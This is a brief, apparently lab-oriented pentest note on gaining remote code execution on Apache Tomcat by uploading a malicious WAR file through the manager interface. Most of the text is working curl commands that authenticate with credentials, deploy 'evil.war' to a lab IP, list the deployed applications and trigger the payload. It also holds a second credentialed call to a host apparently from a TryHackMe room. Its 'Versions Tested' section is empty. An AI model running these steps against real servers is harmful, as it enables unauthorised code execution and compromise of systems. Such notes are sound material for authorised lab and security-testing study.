Uploading malicuous JAR or WAR file

devops, tomcat, java, rce, foothold

Overview #

Attacker can deploy malicuous JAR or WAR file to gain RCE.

Versions Tested #

Steps - CLI #

curl -u 'webdev:password123' --upload-file evil.war 'http://10.10.163.51:8080/manager/text/deploy?path=/evil.war'
curl -u 'webdev:password123' 'http://10.10.163.51:8080/manager/text/list'
curl -u 'webdev:password123' http://10.10.163.51:8080/evil.war

Steps - GUI #

curl -u 'bob:bubbles' http://thm:1234/evil

Alernatives #